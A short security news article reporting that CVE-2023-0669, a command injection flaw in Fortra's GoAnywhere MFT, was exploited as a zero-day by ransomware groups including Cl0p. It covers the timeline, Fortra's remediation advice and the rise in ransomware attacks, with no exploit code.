Fortra’s GoAnywhere MFT Utility vulnerable to ransomware
Fortra has discovered a zero-day remote code execution (RCE) vulnerability in its GoAnywhere MFT utility, which has been actively abused by ransomware perpetrators to steal sensitive data.
The CVE-2023-0669 (CVSS score: 7.2) high-severity bug is related to pre-authenticated command injection, which might be exploited for code execution. The vulnerability was patched in software version 7.1.2 in February 2023, but not before it had been weaponized as a zero-day since January 18.
On January 30, 2023, Fortra claimed that it became aware of certain questionable activities relating to specific instances of file transfers. CVE-2023-0669 was used by an unauthorized entity to create unauthorized user accounts in some MFTaaS (Managed File Transfer as a Service) client setups. The unauthorized entity, according to the firm, used these user identities to download files from their hosted MFTaaS environments for some of these clients.
From January 28 to January 31, the attackers also used two more tools, “Netcat” and “Errors.jsp.” Although not all installation attempts were successful, the vulnerability was exploited against a few on-premise instances of the GoAnywhere MFT solution that were running a certain configuration.
Fortra indicated that it personally informed the affected clients, and that it has discovered no evidence of illegal access to customer systems that have been given with a “clean and secure MFTaaS environment.” To address the matter, the business recommends that users cycle the Master Encryption Key, reset all credentials, examine audit logs, and delete any suspicious admin or user accounts.
In a similar development, Malwarebytes and NCC Group observed an increase in ransomware assaults in March, owing mostly to active exploitation of the GoAnywhere MFT vulnerability. In March 2023, 459 assaults were registered, a 91% rise over February 2023 and a 62% increase over March 2022.
After successfully exploiting the GoAnywhere vulnerability, Cl0p, a ransomware-as-a-service (RaaS) provider, was the most active threat actor spotted, with 129 victims in total. Royal, BlackCat, Play, Black Basta, and BianLian were also common ransomware variants. Cl0p attackers already breached many targets in 2021 by exploiting zero-day vulnerabilities in Accellion File Transfer Appliance (FTA).
The sources for this piece include an article in TheHackerNews.